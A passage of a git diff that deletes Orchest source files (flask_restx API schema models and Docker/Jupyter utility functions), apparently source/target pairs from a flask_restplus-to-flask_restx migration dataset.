fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - }, -) - -environment_build_requests = Model( - "EnvironmentBuildRequests", - { - "environment_build_requests": fields.List( - fields.Nested(environment_build_request), - description="Collection of environment_build_request", - unique=True, - ), - }, -) - -validation_environments = Model( - "GateCheck", - { - "project_uuid": fields.String( - required=True, - description="The project UUID", - ), - "environment_uuids": fields.List( - fields.String(), - required=False, - description="UUIDs to check", - ), - }, -) - -validation_environments_result = Model( - "GateCheckResult", - { - "validation": fields.String( - required=True, - description="Whether the gate check passed or failed", - enum=["pass", "fail"], - ), - "fail": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that failed the validation", - ), - "actions": fields.List( - fields.String(enum=["WAIT", "BUILD", "RETRY"]), - required=True, 
- description="Action to convert environment 'fail' to 'pass'", - ), - "pass": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that passed the validation", - ), - }, -) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py deleted file mode 100644 index df30aaf..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$schema.py.target.py +++ /dev/null @@ -1,383 +0,0 @@ -""" - -TODO: - * Would be amazing if we did not have to maintain a schema here and - also a seperate but exactly similar database model. Is there a way - to share attributes? - -""" -from flask_restx import Model, fields - -from _orchest.internals import config as _config - -# Namespace: Sessions -server = Model( - "Server", - { - "port": fields.Integer( - required=True, default=8888, description="Port to access the server" - ), - "base_url": fields.String(required=True, default="/", description="Base URL"), - }, -) - -session = Model( - "Session", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of session"), - "jupyter_server_ip": fields.String( - required=True, description="IP of the jupyter-server" - ), - "notebook_server_info": fields.Nested( - server, required=True, description="Jupyter notebook server connection info" - ), - }, -) - -sessions = Model( - "Sessions", - { - "sessions": fields.List( - fields.Nested(session), description="Currently running sessions" - ) - }, -) - -pipeline = Model( - "Pipeline", - { - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - "project_dir": fields.String( - required=True, description="Path to pipeline files" - ), - "host_userdir": fields.String( - required=True, description="Host path to userdir" - ), - "settings": fields.Raw( - required=True, description="Settings from the pipeline definition" - ), - }, -) - -# Namespace: Runs & Experiments -pipeline_run_config = Model( - "PipelineRunConfig", - { - "project_dir": fields.String( - required=True, description="Path to project files" - ), - "pipeline_path": fields.String( - required=True, description="Path to pipeline file" - ), - }, -) - -pipeline_run_spec = Model( - "PipelineRunSpec", - { - "uuids": fields.List( - fields.String(), required=False, description="UUIDs of pipeline steps" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "run_type": fields.String( - required=False, - default="full", # TODO: check whether default is used if required=False - description="Type of run", - enum=["full", "selection", "incoming"], - ), - }, -) - -pipeline_run_pipeline_step = Model( - "PipelineRunPipelineStep", - { - "run_uuid": fields.String(required=True, description="UUID of the run"), - "step_uuid": fields.String( - required=True, description="UUID of the pipeline step" - ), - "status": fields.String( - required=True, - description="Status of the step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - "started_time": fields.String( - required=True, description="Time at which the step started 
executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the step finished executing" - ), - }, -) - -pipeline_run = Model( - "Run", - { - "run_uuid": fields.String(required=True, description="UUID of run"), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "status": fields.String(required=True, description="Status of the run"), - "pipeline_steps": fields.List( # TODO: rename - fields.Nested(pipeline_run_pipeline_step), - description="Status of each pipeline step", - ), - }, -) - -interactive_run_config = pipeline_run_config.inherit("InteractiveRunConfig", {}) - -interactive_run_spec = pipeline_run_spec.inherit( - "InteractiveRunSpec", - { - "pipeline_definition": fields.Raw( - required=True, description="Pipeline definition in JSON" - ), - "run_config": fields.Nested( - interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - }, -) - -interactive_run = pipeline_run.inherit("InteractiveRun", {}) - -interactive_runs = Model( - "InteractiveRuns", - { - "runs": fields.List( - fields.Nested(interactive_run), - description='All ran interactive runs during this "lifecycle" of Orchest', - ) - }, -) - -status_update = Model( - "StatusUpdate", - { - "status": fields.String( - required=True, - description="New status of executable, e.g. pipeline or step", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED", "REVOKED"], - ), - }, -) - -# Namespace: Experiments. -non_interactive_run_config = pipeline_run_config.inherit( - "NonInteractiveRunConfig", - { - # Needed for the celery-worker to set the new project-dir for - # experiments. Note that the `orchest-webserver` has this value - # stored in the ENV variable `HOST_USER_DIR`. - "host_user_dir": fields.String( - required=True, description="Path to the /userdir on the host" - ), - }, -) - -non_interactive_run_spec = pipeline_run_spec.inherit( - "NonInteractiveRunSpec", - { - "run_config": fields.Nested( - non_interactive_run_config, - required=True, - description="Configuration for compute backend", - ), - "scheduled_start": fields.String( # TODO: make DateTime - required=False, - # default=datetime.utcnow().isoformat(), - description="Time at which the run is scheduled to start", - ), - }, -) - -non_interactive_run = pipeline_run.inherit( - "NonInteractiveRun", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "pipeline_run_id": fields.Integer( - required=True, description="Respective run ID in experiment" - ), - }, -) - -experiment_spec = Model( - "ExperimentSpecification", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "pipeline_definitions": fields.List( - fields.Raw(description="Pipeline definition in JSON"), - required=True, - description="Collection of pipeline definitions", - ), - "pipeline_run_ids": fields.List( - fields.Integer( - description=( - "Pipeline index corresponding to respective " - "list entries in pipeline_definitions." - ) - ), - required=True, - description="Collection of pipeline definition indices.", - ), - "pipeline_run_spec": fields.Nested( - non_interactive_run_spec, - required=True, - description='Specification of the pipeline runs, e.g. 
"full", "incoming" etc', - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - }, -) - -experiment = Model( - "Experiment", - { - "experiment_uuid": fields.String( - required=True, description="UUID for experiment" - ), - "project_uuid": fields.String(required=True, description="UUID of project"), - "pipeline_uuid": fields.String(required=True, description="UUID of pipeline"), - "total_number_of_pipeline_runs": fields.Integer( - required=True, - description="Total number of pipeline runs part of the experiment", - ), - "pipeline_runs": fields.List( - fields.Nested(non_interactive_run), - description="Collection of pipeline runs part of the experiment", - ), - "scheduled_start": fields.String( - required=True, - description="Time at which the experiment is scheduled to start", - ), - "completed_pipeline_runs": fields.Integer( - required=True, - default=0, - description="Number of completed pipeline runs part of the experiment", - ), - }, -) - -experiments = Model( - "Experiments", - { - "experiments": fields.List( - fields.Nested(experiment), description="Collection of all experiments" - ), - }, -) - -environment_build = Model( - "EnvironmentBuild", - { - "build_uuid": fields.String( - required=True, description="UUID of the environment build" - ), - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - "requested_time": fields.String( - required=True, description="Time at which the build was requested" - ), - "started_time": fields.String( - required=True, description="Time at which the build started executing" - ), - "finished_time": fields.String( - required=True, description="Time at which the build finished executing" - ), - "status": fields.String( - required=True, - description="Status of the build", - enum=["PENDING", "STARTED", "SUCCESS", "FAILURE", "ABORTED"], - ), - }, -) - -environment_builds = Model( - "EnvironmentBuilds", - { - "environment_builds": fields.List( - fields.Nested(environment_build), - description="Collection of environment_builds", - ), - }, -) - -environment_build_request = Model( - "EnvironmentBuildRequest", - { - "project_uuid": fields.String(required=True, description="UUID of the project"), - "environment_uuid": fields.String( - required=True, description="UUID of the environment" - ), - "project_path": fields.String(required=True, description="Project path"), - }, -) - -environment_build_requests = Model( - "EnvironmentBuildRequests", - { - "environment_build_requests": fields.List( - fields.Nested(environment_build_request), - description="Collection of environment_build_request", - unique=True, - ), - }, -) - -validation_environments = Model( - "GateCheck", - { - "project_uuid": fields.String( - required=True, - description="The project UUID", - ), - "environment_uuids": fields.List( - fields.String(), - required=False, - description="UUIDs to check", - ), - }, -) - -validation_environments_result = Model( - "GateCheckResult", - { - "validation": fields.String( - required=True, - description="Whether the gate check passed or failed", - enum=["pass", "fail"], - ), - "fail": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that failed the validation", - ), - "actions": fields.List( - fields.String(enum=["WAIT", "BUILD", "RETRY"]), - required=True, 
- description="Action to convert environment 'fail' to 'pass'", - ), - "pass": fields.List( - fields.String(), - required=True, - description="Environment UUIDs that passed the validation", - ), - }, -) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff deleted file mode 100644 index d8abb07..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/services/orchest-api/app/app/utils.py b/services/orchest-api/app/app/utils.py - index 767e45d497aff0d8506cb6fb8b16e4a3ded1d44d..6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 100644 - --- a/services/orchest-api/app/app/utils.py - +++ b/services/orchest-api/app/app/utils.py -@@ -5,7 +5,7 @@ from typing import Dict, Set, Union - - import requests - from docker import errors --from flask_restplus import Model, Namespace -+from flask_restx import Model, Namespace - from sqlalchemy import and_ - - import app.models as models diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py deleted file mode 100644 index ac0c95d..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.source.py +++ /dev/null @@ -1,394 +0,0 @@ -import logging -import time -from datetime import datetime -from typing import Dict, Set, Union - -import requests -from docker import errors -from flask_restplus import Model, Namespace -from sqlalchemy import and_ - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import db, docker_client - - -def register_schema(api: Namespace) -> Namespace: - all_models = [ - getattr(schema, attr) - for attr in dir(schema) - if isinstance(getattr(schema, attr), Model) - ] - - # TODO: only a subset of all models should be registered. - for model in all_models: - api.add_model(model.name, model) - - return api - - -def shutdown_jupyter_server(url: str) -> bool: - """Shuts down the Jupyter server via an authenticated POST request. - - Sends an authenticated DELETE request to: - "url"/api/kernels/ - for every running kernel. And then shuts down the Jupyter server - itself via an authenticated POST request to: - "url"/api/shutdown - - Args: - connection_file: path to the connection_file that contains the - server information needed to connect to the Jupyter server. - url: the url at which the Jupyter server is running. - - Returns: - False if no Jupyter server is running. True otherwise. - """ - - logging.info("Shutting down Jupyter Server at url: %s" % url) - - # Shutdown the server, such that it also shuts down all related - # kernels. - # NOTE: Do not use /api/shutdown to gracefully shut down all kernels - # as it is non-blocking, causing container based kernels to persist! - r = requests.get(f"{url}api/kernels") - - kernels_json = r.json() - - # In case there are connection issue with the Gateway, then the - # "kernels_json" will be a dictionary: - # {'message': "Connection refused from Gateway server url, ...} - # Thus we first check whether we can indeed start shutting down - # kernels. 
- if isinstance(kernels_json, list): - for kernel in kernels_json: - requests.delete(f'{url}api/kernels/{kernel.get("id")}') - - # Now that all kernels all shut down, also shut down the Jupyter - # server itself. - r = requests.post(f"{url}api/shutdown") - - return True - - -def update_status_db( - status_update: Dict[str, str], model: Model, filter_by: Dict[str, str] -) -> None: - """Updates the status attribute of particular entry in the database. - - Args: - status_update: The new status {'status': 'STARTED'}. - model: Database model to update the status of. - filter_by: The filter to query the exact resource for which to - update its status. - - """ - data = status_update - - if data["status"] == "STARTED": - data["started_time"] = datetime.fromisoformat(data["started_time"]) - elif data["status"] in ["SUCCESS", "FAILURE"]: - data["finished_time"] = datetime.fromisoformat(data["finished_time"]) - - res = model.query.filter_by(**filter_by).update(data) - - if res: - db.session.commit() - - return - - -def get_environment_image_docker_id(name_or_id: str): - try: - return docker_client.images.get(name_or_id).id - except errors.ImageNotFound: - return None - - -def get_env_uuids_to_docker_id_mappings( - project_uuid: str, env_uuids: Set[str] -) -> Dict[str, str]: - """Map each environment uuid to its current image docker id. - - Args: - project_uuid: UUID of the project to which the environments - belong - env_uuids: Set of environment uuids. - - Returns: - Dict[env_uuid] = docker_id - - """ - env_uuid_docker_id_mappings = { - env_uuid: get_environment_image_docker_id( - _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - ) - for env_uuid in env_uuids - } - missing_images = [ - str(errors.ImageNotFound(f"{env_uuid} has no docker image")) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - if docker_id is None - ] - if len(missing_images) > 0: - raise errors.ImageNotFound("\n".join(missing_images)) - return env_uuid_docker_id_mappings - - -def lock_environment_images_for_run( - run_id: str, project_uuid: str, environment_uuids: Set[str] -) -> Dict[str, str]: - """Retrieve the docker ids to use for a pipeline run. - - Locks a set of environment images by making it so that they will - not be deleted by the attempt cleanup that follows an environment - build. - This is done by adding some entries to the db that will signal - the fact that the image will be used by a run, as long as the - run is PENDING or STARTED. - In order to avoid a race condition that happens between - reading the docker ids of the used environment and actually - writing to db, some logic needs to take place, such logic constitutes - the bulk of this function. - As a collateral effect, new entries for interactive or non - interactive image mappings will be added, which is at the same - time the mechanism through which we "lock" the images, or, protect - them from deletion as long as they are needed. - About the race condition: - between the read of the images docker ids and the commit - to the db of the mappings a new environment could have been - built, an image could have become nameless and be - subsequently removed because the image mappings were not - in the db yet, and we would end up with mappings that are - pointing to an image that does not exist. - If we would only check for the existence of the img we could - still be in a race condition, so we must act on the image - becoming nameless, not deleted. 
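The docstring above describes a lock-by-insert scheme: persist the image ids you read, then re-read and reconcile until two consecutive reads agree, at which point the persisted mappings are known to reference live images. A condensed sketch of that loop, with read_current_ids, save_mappings, and update_mapping as hypothetical stand-ins for the db calls in the real function:

    def lock_images(read_current_ids, save_mappings, update_mapping):
        ids = read_current_ids()          # read docker ids per environment
        save_mappings(ids)                # first lock attempt: persist them
        ids2 = read_current_ids()
        while set(ids.values()) != set(ids2.values()):
            # an image was rebuilt between read and commit: repoint the lock
            for env_uuid, docker_id in set(ids2.items()) - set(ids.items()):
                update_mapping(env_uuid, docker_id)
            ids, ids2 = ids2, read_current_ids()
        return ids
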
- - Args: - run_id: - project_uuid: - environment_uuids: - - Returns: - A dictionary mapping environment uuids to the docker id - of the image, so that the run steps can make use of those - images knowingly that the images won't be deleted, even - if they become outdated. - - """ - model = models.PipelineRunImageMapping - - # read the current docker image ids of each env - env_uuid_docker_id_mappings = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - - # write to the db the image_uuids and docker ids the run uses - # this is our first lock attempt - run_image_mappings = [ - model( - **{ - "run_uuid": run_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(run_image_mappings) - db.session.commit() - - # if the mappings have changed it means that at least 1 image - # that we are using has become nameless and it is outdated, and - # might be deleted if we did not lock in time, i.e. if we got - # on the base side of the race condition - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - while set(env_uuid_docker_id_mappings.values()) != set( - env_uuid_docker_id_mappings2.values() - ): - # get which environment images have been updated - # between the moment we read the docker id and the - # commit to db, this is a lock attempt - mappings_to_update = set(env_uuid_docker_id_mappings2.items()) - set( - env_uuid_docker_id_mappings.items() - ) - for env_uuid, docker_id in mappings_to_update: - model.query.filter( - # same task - model.run_uuid == run_id, - # same environment - model.orchest_environment_uuid == env_uuid - # update docker id to which the run will point to - ).update({"docker_img_id": docker_id}) - db.session.commit() - - env_uuid_docker_id_mappings = env_uuid_docker_id_mappings2 - - # the next time we check for equality, - # if they are equal that means that we know that we are - # pointing to images that won't be deleted because the - # run is already in the db as PENDING - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - return env_uuid_docker_id_mappings - - -def interactive_runs_using_environment(project_uuid: str, env_uuid: str): - """Get the list of interactive runs using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.InteractivePipelineRun.query.filter( - models.InteractivePipelineRun.project_uuid == project_uuid, - models.InteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.InteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - - -def experiments_using_environment(project_uuid: str, env_uuid: str): - """Get the list of experiments using a given environment. 
- - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.Experiment.query.filter( - # exp related to this project - models.Experiment.project_uuid == project_uuid, - # keep project for which at least a run uses the environment - # and is or will make use of the environment (PENDING/STARTED) - models.Experiment.pipeline_runs.any( - and_( - models.NonInteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.NonInteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ) - ), - ).all() - - -def is_environment_in_use(project_uuid: str, env_uuid: str) -> bool: - """True if the environment is or will be in use by a run/experiment - - Args: - env_uuid: - - Returns: - bool: - """ - - int_runs = interactive_runs_using_environment(project_uuid, env_uuid) - exps = experiments_using_environment(project_uuid, env_uuid) - return len(int_runs) > 0 or len(exps) > 0 - - -def is_docker_image_in_use(img_id: str) -> bool: - """True if the image is or will be in use by a run/experiment - - Args: - img_id: - - Returns: - bool: - """ - - runs = models.PipelineRun.query.filter( - models.PipelineRun.image_mappings.any(docker_img_id=img_id), - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - return bool(runs) - - -def remove_if_dangling(img) -> bool: - """Remove an image if its dangling. - - A dangling image is an image that is nameless and tag-less, - and for which no runs exist that are PENDING or STARTED and that - are going to use this image in one of their steps. - - Args: - img: - - Returns: - True if the image was successfully removed. - False if not, e.g. if it is not nameless or if it is being used - or will be used by a run. - - """ - # nameless image - if len(img.attrs["RepoTags"]) == 0 and not is_docker_image_in_use(img.id): - # need to check multiple times because of a race condition - # given by the fact that cleaning up a project will - # stop runs and experiments, then cleanup images and dangling - # images, it might be that the celery worker running the task - # still has to shut down the containers - tries = 10 - while tries > 0: - try: - docker_client.images.remove(img.id) - return True - except errors.ImageNotFound: - return False - except Exception as e: - logging.warning(f"exception during removal of image {img.id}:\n{e}") - pass - time.sleep(1) - tries -= 1 - return False - - -def parse_string_memory_size(memory_size: Union[str, int]) -> int: - """Simply converts string description of memory size to number of bytes - - Allowable inputs are: [\d]+\s*(KB|MB|GB)+ - """ - - # seems like this is already int (assumed to be number of bytes) - if isinstance(memory_size, int): - return memory_size - - conversion = {"KB": 1000, "MB": 1000 ** 2, "GB": 1000 ** 3} - size, unit = memory_size[:-2], memory_size[-2:] - size = int(float(size) * conversion[unit]) - - return size - - -def calculate_shm_size(data_passing_memory_size: int) -> int: - """Calculates the shm-size for the Docker container. - - Given a size for the memory-server we need to do a certain - allocation to get to that size. In other words, the `shm-size` for - the Docker container is not equal to the request size for the - memory-server. - - If the Plasma server tries to allocate more than is available in /dev/shm it - will not fail but issue a warning. However, the full amount requested will - not be available to the user. - - Args: - data_passing_memory_size: Requested size for the memory-server. - - Returns: - The shm-size for the Docker container. 
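The two helpers above compose: a human-readable size string is converted to bytes using decimal (SI) units, and the result is then overallocated by 20% to size /dev/shm for the memory-server. Expected values, assuming the two functions exactly as defined in the hunk:

    parse_string_memory_size("1GB")    # -> 1_000_000_000 (SI units, not 2**30)
    parse_string_memory_size(512)      # ints are taken to be bytes already -> 512
    calculate_shm_size(1_000_000_000)  # -> 1_200_000_000, the 20% overallocation
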
- - """ - # We need to overallocate by a fraction to make /dev/shm large enough for the - # request amount in `data_passing_memory_size` - return int(data_passing_memory_size * 1.2) diff --git a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py b/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py deleted file mode 100644 index d6bf9f1..0000000 --- a/v1/data/codefile/orchest@orchest__6b629d0__services$orchest-api$app$app$utils.py.target.py +++ /dev/null @@ -1,394 +0,0 @@ -import logging -import time -from datetime import datetime -from typing import Dict, Set, Union - -import requests -from docker import errors -from flask_restx import Model, Namespace -from sqlalchemy import and_ - -import app.models as models -from _orchest.internals import config as _config -from app import schema -from app.connections import db, docker_client - - -def register_schema(api: Namespace) -> Namespace: - all_models = [ - getattr(schema, attr) - for attr in dir(schema) - if isinstance(getattr(schema, attr), Model) - ] - - # TODO: only a subset of all models should be registered. - for model in all_models: - api.add_model(model.name, model) - - return api - - -def shutdown_jupyter_server(url: str) -> bool: - """Shuts down the Jupyter server via an authenticated POST request. - - Sends an authenticated DELETE request to: - "url"/api/kernels/ - for every running kernel. And then shuts down the Jupyter server - itself via an authenticated POST request to: - "url"/api/shutdown - - Args: - connection_file: path to the connection_file that contains the - server information needed to connect to the Jupyter server. - url: the url at which the Jupyter server is running. - - Returns: - False if no Jupyter server is running. True otherwise. - """ - - logging.info("Shutting down Jupyter Server at url: %s" % url) - - # Shutdown the server, such that it also shuts down all related - # kernels. - # NOTE: Do not use /api/shutdown to gracefully shut down all kernels - # as it is non-blocking, causing container based kernels to persist! - r = requests.get(f"{url}api/kernels") - - kernels_json = r.json() - - # In case there are connection issue with the Gateway, then the - # "kernels_json" will be a dictionary: - # {'message': "Connection refused from Gateway server url, ...} - # Thus we first check whether we can indeed start shutting down - # kernels. - if isinstance(kernels_json, list): - for kernel in kernels_json: - requests.delete(f'{url}api/kernels/{kernel.get("id")}') - - # Now that all kernels all shut down, also shut down the Jupyter - # server itself. - r = requests.post(f"{url}api/shutdown") - - return True - - -def update_status_db( - status_update: Dict[str, str], model: Model, filter_by: Dict[str, str] -) -> None: - """Updates the status attribute of particular entry in the database. - - Args: - status_update: The new status {'status': 'STARTED'}. - model: Database model to update the status of. - filter_by: The filter to query the exact resource for which to - update its status. 
- - """ - data = status_update - - if data["status"] == "STARTED": - data["started_time"] = datetime.fromisoformat(data["started_time"]) - elif data["status"] in ["SUCCESS", "FAILURE"]: - data["finished_time"] = datetime.fromisoformat(data["finished_time"]) - - res = model.query.filter_by(**filter_by).update(data) - - if res: - db.session.commit() - - return - - -def get_environment_image_docker_id(name_or_id: str): - try: - return docker_client.images.get(name_or_id).id - except errors.ImageNotFound: - return None - - -def get_env_uuids_to_docker_id_mappings( - project_uuid: str, env_uuids: Set[str] -) -> Dict[str, str]: - """Map each environment uuid to its current image docker id. - - Args: - project_uuid: UUID of the project to which the environments - belong - env_uuids: Set of environment uuids. - - Returns: - Dict[env_uuid] = docker_id - - """ - env_uuid_docker_id_mappings = { - env_uuid: get_environment_image_docker_id( - _config.ENVIRONMENT_IMAGE_NAME.format( - project_uuid=project_uuid, environment_uuid=env_uuid - ) - ) - for env_uuid in env_uuids - } - missing_images = [ - str(errors.ImageNotFound(f"{env_uuid} has no docker image")) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - if docker_id is None - ] - if len(missing_images) > 0: - raise errors.ImageNotFound("\n".join(missing_images)) - return env_uuid_docker_id_mappings - - -def lock_environment_images_for_run( - run_id: str, project_uuid: str, environment_uuids: Set[str] -) -> Dict[str, str]: - """Retrieve the docker ids to use for a pipeline run. - - Locks a set of environment images by making it so that they will - not be deleted by the attempt cleanup that follows an environment - build. - This is done by adding some entries to the db that will signal - the fact that the image will be used by a run, as long as the - run is PENDING or STARTED. - In order to avoid a race condition that happens between - reading the docker ids of the used environment and actually - writing to db, some logic needs to take place, such logic constitutes - the bulk of this function. - As a collateral effect, new entries for interactive or non - interactive image mappings will be added, which is at the same - time the mechanism through which we "lock" the images, or, protect - them from deletion as long as they are needed. - About the race condition: - between the read of the images docker ids and the commit - to the db of the mappings a new environment could have been - built, an image could have become nameless and be - subsequently removed because the image mappings were not - in the db yet, and we would end up with mappings that are - pointing to an image that does not exist. - If we would only check for the existence of the img we could - still be in a race condition, so we must act on the image - becoming nameless, not deleted. - - Args: - run_id: - project_uuid: - environment_uuids: - - Returns: - A dictionary mapping environment uuids to the docker id - of the image, so that the run steps can make use of those - images knowingly that the images won't be deleted, even - if they become outdated. 
- - """ - model = models.PipelineRunImageMapping - - # read the current docker image ids of each env - env_uuid_docker_id_mappings = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - - # write to the db the image_uuids and docker ids the run uses - # this is our first lock attempt - run_image_mappings = [ - model( - **{ - "run_uuid": run_id, - "orchest_environment_uuid": env_uuid, - "docker_img_id": docker_id, - } - ) - for env_uuid, docker_id in env_uuid_docker_id_mappings.items() - ] - db.session.bulk_save_objects(run_image_mappings) - db.session.commit() - - # if the mappings have changed it means that at least 1 image - # that we are using has become nameless and it is outdated, and - # might be deleted if we did not lock in time, i.e. if we got - # on the base side of the race condition - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - while set(env_uuid_docker_id_mappings.values()) != set( - env_uuid_docker_id_mappings2.values() - ): - # get which environment images have been updated - # between the moment we read the docker id and the - # commit to db, this is a lock attempt - mappings_to_update = set(env_uuid_docker_id_mappings2.items()) - set( - env_uuid_docker_id_mappings.items() - ) - for env_uuid, docker_id in mappings_to_update: - model.query.filter( - # same task - model.run_uuid == run_id, - # same environment - model.orchest_environment_uuid == env_uuid - # update docker id to which the run will point to - ).update({"docker_img_id": docker_id}) - db.session.commit() - - env_uuid_docker_id_mappings = env_uuid_docker_id_mappings2 - - # the next time we check for equality, - # if they are equal that means that we know that we are - # pointing to images that won't be deleted because the - # run is already in the db as PENDING - env_uuid_docker_id_mappings2 = get_env_uuids_to_docker_id_mappings( - project_uuid, environment_uuids - ) - return env_uuid_docker_id_mappings - - -def interactive_runs_using_environment(project_uuid: str, env_uuid: str): - """Get the list of interactive runs using a given environment. - - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.InteractivePipelineRun.query.filter( - models.InteractivePipelineRun.project_uuid == project_uuid, - models.InteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.InteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - - -def experiments_using_environment(project_uuid: str, env_uuid: str): - """Get the list of experiments using a given environment. 
- - Args: - project_uuid: - env_uuid: - - Returns: - """ - return models.Experiment.query.filter( - # exp related to this project - models.Experiment.project_uuid == project_uuid, - # keep project for which at least a run uses the environment - # and is or will make use of the environment (PENDING/STARTED) - models.Experiment.pipeline_runs.any( - and_( - models.NonInteractivePipelineRun.image_mappings.any( - orchest_environment_uuid=env_uuid - ), - models.NonInteractivePipelineRun.status.in_(["PENDING", "STARTED"]), - ) - ), - ).all() - - -def is_environment_in_use(project_uuid: str, env_uuid: str) -> bool: - """True if the environment is or will be in use by a run/experiment - - Args: - env_uuid: - - Returns: - bool: - """ - - int_runs = interactive_runs_using_environment(project_uuid, env_uuid) - exps = experiments_using_environment(project_uuid, env_uuid) - return len(int_runs) > 0 or len(exps) > 0 - - -def is_docker_image_in_use(img_id: str) -> bool: - """True if the image is or will be in use by a run/experiment - - Args: - img_id: - - Returns: - bool: - """ - - runs = models.PipelineRun.query.filter( - models.PipelineRun.image_mappings.any(docker_img_id=img_id), - models.PipelineRun.status.in_(["PENDING", "STARTED"]), - ).all() - return bool(runs) - - -def remove_if_dangling(img) -> bool: - """Remove an image if its dangling. - - A dangling image is an image that is nameless and tag-less, - and for which no runs exist that are PENDING or STARTED and that - are going to use this image in one of their steps. - - Args: - img: - - Returns: - True if the image was successfully removed. - False if not, e.g. if it is not nameless or if it is being used - or will be used by a run. - - """ - # nameless image - if len(img.attrs["RepoTags"]) == 0 and not is_docker_image_in_use(img.id): - # need to check multiple times because of a race condition - # given by the fact that cleaning up a project will - # stop runs and experiments, then cleanup images and dangling - # images, it might be that the celery worker running the task - # still has to shut down the containers - tries = 10 - while tries > 0: - try: - docker_client.images.remove(img.id) - return True - except errors.ImageNotFound: - return False - except Exception as e: - logging.warning(f"exception during removal of image {img.id}:\n{e}") - pass - time.sleep(1) - tries -= 1 - return False - - -def parse_string_memory_size(memory_size: Union[str, int]) -> int: - """Simply converts string description of memory size to number of bytes - - Allowable inputs are: [\d]+\s*(KB|MB|GB)+ - """ - - # seems like this is already int (assumed to be number of bytes) - if isinstance(memory_size, int): - return memory_size - - conversion = {"KB": 1000, "MB": 1000 ** 2, "GB": 1000 ** 3} - size, unit = memory_size[:-2], memory_size[-2:] - size = int(float(size) * conversion[unit]) - - return size - - -def calculate_shm_size(data_passing_memory_size: int) -> int: - """Calculates the shm-size for the Docker container. - - Given a size for the memory-server we need to do a certain - allocation to get to that size. In other words, the `shm-size` for - the Docker container is not equal to the request size for the - memory-server. - - If the Plasma server tries to allocate more than is available in /dev/shm it - will not fail but issue a warning. However, the full amount requested will - not be available to the user. - - Args: - data_passing_memory_size: Requested size for the memory-server. - - Returns: - The shm-size for the Docker container. 
